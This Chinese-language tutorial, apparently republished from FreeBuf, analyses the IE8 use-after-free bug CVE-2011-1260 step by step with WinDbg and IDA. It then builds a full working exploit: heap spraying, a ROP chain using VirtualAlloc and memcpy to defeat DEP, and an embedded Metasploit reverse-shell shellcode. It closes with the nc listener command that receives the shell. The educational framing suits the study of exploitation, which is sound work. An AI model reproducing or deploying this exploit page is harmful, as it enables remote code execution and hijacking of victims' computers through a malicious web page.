针对网页木马（CVE-2011-1260）的分析与实践

本文假设你对漏洞挖掘，漏洞分析，汇编这些不太了解，但是对C，C++有一定了解。首先我们找一个具体的公开的例子——CVE-2011-1260，释放后重用漏洞。首先我们上网找一下这个漏洞的POC，得到如下（运行环境XP SP3，IE8，开启DEP（稍后解释什么是DEP））：

<html> 
<body> 
<script language=;javascript;> 
document.body.innerHTML+="<object hspace=;1000;   width=;1000;>TAG_1</object>"; 
document.body.innerHTML+="<a id=;tag_3; style=;bottom:5000px;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px; >TAG_3</a>"; 
document.body.innerHTML += "AAAAAAA"; 
document.body.innerHTML+="<strong style=;font-size:1000pc;margin:auto -25000px auto auto;; dir=;ltr;>TAG_11</strong>"; 
</script> 
</body> 
</html> 

0×1 漏洞分析

我们双击打开，发现IE崩溃了，到底是什么原因呢？
我们用windbg附加进程（调试IE最好还是用微软的调试器，毕竟微软主场）：附加后，按g，回车，如果限制了activeX控件运行，就按允许，然后windbg在崩溃的时候停止了：

从eax+70的地址取出数据，显然这个地址不合法，所以导致错误。我们按knL回车，从栈查看函数的调用情况：

不清楚栈的看这里，清楚的跳过：函数调用有很多种，这里指stdcall，在每一次调用之前，都会将参数压栈，从右到左，比如Void A（int a，int b），汇编就类似push，push，call，Call指令会将call指令的下一条指令的地址压栈，所以最后栈看起来是这样的：（注意，压栈是从高往低压）

[[134065]]

 对应源代码：

所以我们从栈中可以看出崩毁之前调用过什么函数，以及现在在什么函数里面,函数返回地址等等很多信息。

 这里我们可以看到是在CElement：：Doc函数里面崩毁，看看附近的汇编指令：

 取ecx地址的内容返回给eax，但是eax是0，导致后来的内存读取错误，显然ecx出了问题。一般情况下，在thiscall中，第一个参数是this指针(用ecx传递)，而对象+0x0h的地方储存的是虚函数表的地址，所以可得这里是取虚函数表偏移0×70的地方的虚函数指针，再调用这个虚函数。

显然这里的ecx就是CElement对象，这个对象是IE里面很多元素的父类，如(CObjectElement，对应<object>标签，CImgElement，对应<img>标签等等)，而我们从POC中可以看出我们生成了一个<object>标签，所以我们可以推断这个是CObjectElement对象，那么这个对象从哪里来的呢？再看进入这个函数之前的汇编代码：

 取ebx地址的内容给ecx，那么ebx哪里来？我们用ida反汇编这个函数看看（在mshtml.dll）

 Ebx就是this指针，即ebx指向的地方就是CTreeNode，然后CTreeNode对象+0x0h的地方传给ecx(即偏移0x0h保存了对应的CElement指针)，再传入CElement::Doc。那么CTreeNode和CElement有什么关系呢？

我们重新运行，然后定如下两个断点:

bu  mshtml!CObjectElement::CreateElement+0x18 ".printf \"[%08x]\\n\",eax;g" 

在mshtml!CObjectElement::CreateElement+0×18出断下，并且打印eax的值，然后继续运行。从文字可以看出这个是构造CObjectElement的函数，里面会调用CObjectElement的构造函数，eax一般是函数返回的值，即这个对象的指针。
 

 函数中分配了一个0xDC的堆，显然这是这个对象的大小。

bu  mshtml!CTreeNode::CTreeNode+0x8c ".printf \"allocated CTreeNode at %08x, ref to CElement %08x of tbale %08x\\n\", eax, poi(eax), poi(poi(eax));dds poi(eax) L 1;g" 

这个断点是在CTreeNode+0x8c地方断下，打印对象指针，对应的CElement指针(CTreeNode+0×0处保存对应CElement对象)，以及对应的CElement对象的虚函数表地址。

定好断点，GO！

 从图可以看出，最后创建了一个CObjectElement对象在00201c30，然后立马又创建了与之对应的CTreeNode对象0338aa18，到了程序崩毁的地方，ebx(即CTreeNode对象)还是0338aa18，但是与之对应的CObjectElement对象(ecx)却改变了。

我们看00201c30的地方:

这里已经不是CObjectElement的虚函数表，说明这个对象已经被释放，所以与之对应的CTreeNode也在崩溃之前释放了，所以这里CTreeNode+0×0的CObjectElement指针也是错误的，所以指向的地方是00000000，然后读取虚函数表出错。我们定下断点:

bu  mshtml!CTreeNode::Release+0x19 ".printf \"freeing CTreeNode at %08x, CElement at %08x, of table %08x\\n\", edx, poi(edx), poi(poi(edx)); g" 

这里可以看出，在IE崩溃前，CTreeNode已经释放了，然后崩溃时又引用了这个对象对应的CElement对象，然后call虚函数，导致程序出错。为什么会释放呢？因为<object>标签没指明clsid值，所以IE会释放这个标签，那么接下来我们可以干什么呢？#p#

0×2 漏洞利用

我们既然这个CTreeNode已经释放了，那么+0×0对应的CElement对象指针所指向的地方我们有无办法控制呢？我们发现最后崩溃时候ecx指向的地方很接近之前CObjectElement分配到的地方，而且这个地方已经释放了，我们知道，当一个对象的内存空间释放后，如果我们大量申请内存，我们迟早会用到这个之前释放的内存空间，因为本来内存就那么多，要循环利用嘛。如果我们大量申请和CObjectElement相同大小的堆块，我们会不会把ecx指向的地方覆盖呢?我们试试:

果然，ecx指向的地方已经被0x0c0c0c0c覆盖，根据汇编代码，之后会call [0x0c0c0c0c+0x70]

然后我们能把0x0c0c0c0c+0×70写上某个地址，然后eip就会跳到这个地址执行我们指定的代码，进而pwn IE 8。

那我们有什么办法在0x0c0c0c0c这里写上我们要写的数据呢？也是老方法，通过大量申请堆块，我们迟早会把0x0c0c0c0c这里覆盖成我们的内容。

这是如果没有DEP的话，我们直接用大量的nops+shellcode覆盖内存，然后精确计算在0x0c0c0c0c+0×70的地方填上我们shellcode的地址，我们就能跳去shellcode运行啦。但是这里有DEP。DEP就是如果这块内存没有执行权限的话，即使EIP跳到这里，它也不能执行代码。而我们通过大量申请堆块而放置shellcode的地方，系统是不允许在这里运行指令的。这时候，我们可以用ROP绕过DEP。ROP就是在堆栈中压入若干个小程序的地址，不断控制EIP运行到这些小程序里，达到某种目的。因为不直接在不可运行的内存中运行代码，所以可以绕过DEP。等下我会具体举例子。

要绕过DEP，我们可以通过VirtualAlloc+memcpy的方法，前者可以分配一个内存属性为可读可写可执行的内存区域，然后用memcpy把我们的shellcode复制过去。然后EIP跳到这个区域运行shellcode。(shellcode就是我们想要达到某种目的的代码，比如恶作剧可以是弹出一个对话框，把这些代码变成汇编的机器码，然后复制入内存里面，控制EIP跳至这里执行。)

首先我们要在0x0c0c0c0c的地方伪造一个栈，

通过MSDN查看我们要用的VirtualAlloc与memcpy函数的使用方法，最终我们决定利用两行代码绕过DEP(XP3下没有开启ASLR):

VirtualAlloc(分配的内存地址，内存大小，内存种类，内存属性)

VirtuallAlloc(0x7f002000,0x00004000,0x00003000,0x00000040) 
Memcpy(0x7f003000,0x0c0c0c80,0x00001000) 

然后我们构造栈结构如下:

然后我们要想办法把esp(指向栈顶)指向0x0c0c0c0c，由于我们已经控制EIP(0x0c0c0c0c+0×70)，所以如果我们在这里写入0x76a712ff，该处的指令为xchg eax，esp//ret。然后我们EIP指向0x76a712ff，交换eax和esp(eax这时指向0x0c0c0c0c)，然后ret(ret指令就是将EIP变成[ESP]，然后ESP+4)，这时EIP会变成0x7C809AE1。前面我们已经说过，刚进入函数的时候，[ESP]是函数返回地址，即到最后ret会将EIP变成这个地址，然后下面的是参数，从低到高(从上到下)分别对应C语言中的从左到右，即0x7f002000，0×00004000，0×00003000，0×00000040。然后我们看VirtualAlloc返回的时候指令

Retn 10的意思是EIP变成[ESP]，然后ESP+14，所以运行完retn 10后，我们会跳入0x7c921db3(memcpy)，然后[ESP]是函数返回地址(0x7f001000)，然后下面三个是参数，运行完这个函数后，我们会跳入返回地址0x7f001000运行shellcode。(函数调用的具体过程大家可以参考《C++反汇编与逆向分析》的第六章)

然后0x0c0c0c34-0x0c0c0c7c我们放入随意的数据，然后0x0c0c0c7c放入0x76a712ff，然后0x0c0c0c80我们放入我们的shellcode。

按理来说，只要我们把上面的数据我们组成一个块(block1)，然后申请大量内存填入这些块，最终覆盖0x0c0c0c0c就可以了。但是又有问题来了，堆块申请的起始地址是会变的!!!例如，我们堆块开始可能的地方可能是0x0c0c0000也可能是0x0c0c0010，我们知道，如果这个地址变了，我们最终就无法令我们这个块一开始的地方准确地对准0x0c0c0c0c，然后我们0x0c0c0c0c+0×70的地方的数据就会将EIP指向一个错误的地方，然后bomb，IE又崩溃。

如果没有DEP，我们可以覆盖大量的NOP(1mb左右)+shellcode(几百字节)，然后只要0x0c0c0c0c的地方是NOP就可以了(很大几率hit中nop)，但是这里不行，我们要准确的堆喷射。在这里，我陷入了深深的沉思，我确实在这里想了很久的办法，网上找了资料，大部分说的都是nop+shellcode，没有准确的堆喷射，即使有，也看得不明白。后来我突然发现，我们块的起始地址有个共同的特点:

0c0a8040是堆块的起始地址，前8字节是块首，真正我们用的是0c0a8048开始，我们在JS里面喷射用过的是string类型，前4字节是保存string的大小，后2字节是0000表示字符串解释，所以我们这里发现，我们字符串起始的位置都是04c结尾有木有?!! 如果我们创建一个块大小是0×1000(block2)，然后前面0xc0c-0×048=0xbc4字节放入nop，然后再放入我们上面的block1，然后后面全部放入nop。然后我们的内存全部塞满这样的块，我们是不是就保证了全部0xXXXXXc0c地址都对准了我们block1的起始位置?(包括0x0c0c0c0c)(这是我自己想到的方法，不知道大家有无别的好方法?)

接下来，我们就要写shellcode，这里我们用kail或者BT5的msfpayload生成一个反弹命令行至本地1024端口的JS版shellcode，然后加入我们的exp中。最终我们的exp如下(heapLib.js是一个网上大家用来堆喷射的库，某个牛人写的):

<html> 
<body> 
<script src="heapLib.js"></script> 
<script language=;javascript;> 
var heap_obj0 = new heapLib.ie(0x20000); 
var heapspray=;\u9ae1\u7c80\u1db3\u7c92\u2000\u7f00\u4000\u0000\u3000\u0000\u0040\u0000\u3000\u7f00\u3000\u7f00\u0c80\u0c0c\u2fff\u0000;; 
while(heapspray.length<0x38) 
heapsprayheapspray=heapspray+;\u9090\u9090;; 
heapspray+=;\u12ff\u76a7;; 
heapspray+=unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050%u5040%u5040%uea68%udf0f%uffe0%u89d5%u68c7%u007f%u0100%u0268%u0400%u8900%u6ae6%u5610%u6857%ua599%u6174%ud5ff%u6368%u646d%u8900%u57e3%u5757%uf631%u126a%u5659%ufde2%uc766%u2444%u013c%u8d01%u2444%uc610%u4400%u5054%u5656%u4656%u4e56%u5656%u5653%u7968%u3fcc%uff86%u89d5%u4ee0%u4656%u30ff%u0868%u1d87%uff60%ubbd5%ub5f0%u56a2%ua668%ubd95%uff9d%u3cd5%u7c06%u800a%ue0fb%u0575%u47bb%u7213%u6a6f%u5300%ud5ff"); 
var nops=unescape(;%u9090%u9090;); 
while(nops.length<0x800) 
nops+=nops; 
block=nops.substring(0,0xBC0/2)+heapspray+nops.substring(0,0x800-0xBC0/2-heapspray.length); 
while(block.length<0x40000) 
block+=block; 
final=block.substring(0,(0x20000-6)/2); 
for(var i=0;i<0x1000;i++){ 
heap_obj0.alloc(final,"test1"); 
} 
var obj_overwrite=unescape(;%u0c0c%u0c0c;); 
var obj_size=0xe0; 
while(obj_overwrite.length < 70){ 
obj_overwrite+=obj_overwrite; 
} 
obj_overwriteobj_overwrite=obj_overwrite.slice(0,(obj_size-6)/2); 
for(var i=0;i<5;i++){ 
document.body.innerHTML+="<object align=;right; hspace=;1000;   width=;1000;>TAG_1</object>"; 
} 
var heap_obj = new heapLib.ie(0x10000); 
for(var j=0;j<5000;j++){ 
heap_obj.alloc(obj_overwrite,"test"); 
} 
document.body.innerHTML += "<a id=;tag_3; style=;bottom:200cm;float:left;padding-left:-1000px;border-width:2000px;text-indent:-1000px; >TAG_3</a>"; 
document.body.innerHTML += "AAAAAAA"; 
document.body.innerHTML += "<strong style=;font-size:1000pc;margin:auto -1000cm auto auto;; dir=;ltr;>TAG_11</strong>"; 
</script> 
</body> 
</html> 

Nc.exe –l –p 1024就是监听1024端口，等待反弹shell。

以上，就是一个经典的利用IE UAF漏洞进行远程代码执行的完整过程，有了远程代码执行，木马还会远吗？由于本人菜鸟，难免会有错误的地方，希望大家一起能共同探讨学习。

所以大家知道上XX网的危害了吗？不要以为没下载病毒没事哦，恶意JS都能有exe的功能。

本文出自：http://www.freebuf.com/vuls/66865.html